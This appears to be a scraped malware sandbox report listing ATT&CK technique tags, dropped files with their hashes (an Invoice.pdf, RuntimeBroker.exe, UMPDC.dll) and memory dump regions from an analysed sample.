Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
f26d40f3fe3b07202462281e3520a8a5

SHA1
38c528ce4457b2bb1fd9aa18597275e4ca6492ef

SHA256
a556110b4c51077cba0f523c08060bb41b3380751311f47f3da03de9cf20bf84

SHA512
2a9af331837bc09e21f06aab4b6ad2a532defd5e0719fe42ea73e5cd44e6262eb2f8df46c07b843d46d457737eceec716829f3a3f7a5fa94282f420ddaed5de4

Download Submit
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe
Filesize
100KB

MD5
ba4cfe6461afa1004c52f19c8f2169dc

SHA1
ab8539ef6b2a93ff9589dec4b34a0257b6296c92

SHA256
e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628

SHA512
2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0

Download Submit
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe
Filesize
100KB

MD5
ba4cfe6461afa1004c52f19c8f2169dc

SHA1
ab8539ef6b2a93ff9589dec4b34a0257b6296c92

SHA256
e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628

SHA512
2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0

Download Submit
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\UMPDC.dll
Filesize
391KB

MD5
1570c92c1c5f039c438295ac68ff7e82

SHA1
3ee6c1d3582361e8af4efec44b1d1420494ab728

SHA256
b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4

SHA512
fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\info.txt
Filesize
174KB

MD5
ec5071963e2367e037a45fab530a5458

SHA1
fe9c636957dce8e9d633a5689466041637a70c26

SHA256
d4219b706d7d914ba1e0dc0c32804b522d3b38f0947e3b902a02c35d89f56259

SHA512
81f88a30d73bb468f95a6905c893c9100a2c83d6a69c2712265df0192f8e3400df6ad30e1a567a8472b999af38db8d583b7d234526095f0f4b1a5267081855aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\umpdc.dll
Filesize
391KB

MD5
1570c92c1c5f039c438295ac68ff7e82

SHA1
3ee6c1d3582361e8af4efec44b1d1420494ab728

SHA256
b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4

SHA512
fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992

Download Submit
C:\Users\Admin\Downloads\Invoice.pdf
Filesize
6KB

MD5
662e6c1a869b8a4abc54a7ed8bc23088

SHA1
c16f1dfa1f2488072d87f100a7d11ecaf90ca9d4

SHA256
15d2050a1a60c36ae602981ac19e371a6fae40aed0f5aee6334fbcc721e5b140

SHA512
5bd17a8cbbb0a7a9565d434cfc507213c91bfeac4cea6b7ea0908ec71fbbcf9f3956d1b9b6c9059dbd466f5cfa7efa2948bc338a4331401b4c8be1e5343c9c99

Download Submit
memory/1032-182-0x0000000000000000-mapping.dmp

Download
memory/1172-189-0x0000000000000000-mapping.dmp

Download
memory/2008-154-0x0000000008350000-0x0000000008362000-memory.dmp

Filesize
72KB

Download
memory/2008-141-0x0000000000000000-mapping.dmp

Download
memory/2008-143-0x00000000074C0000-0x0000000007536000-memory.dmp

Filesize
472KB

Download
memory/2008-144-0x0000000007790000-0x0000000007826000-memory.dmp

Filesize
600KB

Download
memory/2008-145-0x0000000007720000-0x0000000007742000-memory.dmp

Filesize
136KB

Download
memory/2008-146-0x00000000087F0000-0x0000000008D94000-memory.dmp

Filesize
5.6MB

Download
memory/2008-142-0x00000000064C0000-0x0000000006504000-memory.dmp

Filesize
272KB

Download
memory/2008-155-0x0000000008370000-0x000000000837A000-memory.dmp

Filesize
40KB

Download
memory/2008-149-0x0000000007AF0000-0x0000000007B22000-memory.dmp

Filesize
200KB

Download
memory/2008-150-0x0000000070430000-0x000000007047C000-memory.dmp

Filesize
304KB

Download
memory/2008-151-0x00000000707D0000-0x0000000070B24000-memory.dmp

Filesize
3.3MB

Download
memory/2008-152-0x0000000007AD0000-0x0000000007AEE000-memory.dmp

Filesize
120KB

Download
memory/2008-153-0x0000000007B80000-0x0000000007B8A000-memory.dmp

Filesize
40KB

Download
memory/2208-192-0x0000000000000000-mapping.dmp

Download
memory/2260-139-0x00000000080F0000-0x000000000876A000-memory.dmp

Filesize
6.5MB

Download
memory/2260-137-0x00000000062B0000-0x0000000006316000-memory.dmp

Filesize
408KB

Download
memory/2260-133-0x00000000053F0000-0x0000000005426000-memory.dmp

Filesize
216KB

Download
memory/2260-140-0x0000000006D90000-0x0000000006DAA000-memory.dmp

Filesize
104KB

Download
memory/2260-132-0x0000000000000000-mapping.dmp

Download
memory/2260-138-0x00000000068C0000-0x00000000068DE000-memory.dmp

Filesize
120KB

Download
memory/2260-134-0x0000000005BA0000-0x00000000061C8000-memory.dmp

Filesize
6.2MB

Download
memory/2260-135-0x00000000059F0000-0x0000000005A12000-memory.dmp

Filesize
136KB

Download
memory/2260-136-0x00000000061D0000-0x0000000006236000-memory.dmp

Filesize
408KB

Download
memory/2280-157-0x0000000000000000-mapping.dmp

Download
memory/3256-174-0x0000000000000000-mapping.dmp

Download
memory/3256-179-0x00000183D2D70000-0x00000183D2DEE000-memory.dmp

Filesize
504KB

Download
memory/3256-176-0x00000183D2C10000-0x00000183D2C54000-memory.dmp

Filesize
272KB

Download
memory/3372-166-0x0000000000000000-mapping.dmp

Download
memory/3856-172-0x0000000000000000-mapping.dmp

Download
memory/4024-181-0x0000000000000000-mapping.dmp

Download
memory/4088-163-0x0000000000000000-mapping.dmp

Download
memory/4168-147-0x0000000000000000-mapping.dmp

Download
memory/4256-186-0x0000000000000000-mapping.dmp

Download
memory/4404-184-0x0000000000000000-mapping.dmp

Download
memory/4988-167-0x00007FF9E57F0000-0x00007FF9E59E5000-memory.dmp

Filesize
2.0MB

Download
memory/4988-158-0x0000000000000000-mapping.dmp

Download
memory/4988-194-0x00007FF9E57F0000-0x00007FF9E59E5000-memory.dmp

Filesize
2.0MB

Download
memory/5008-156-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads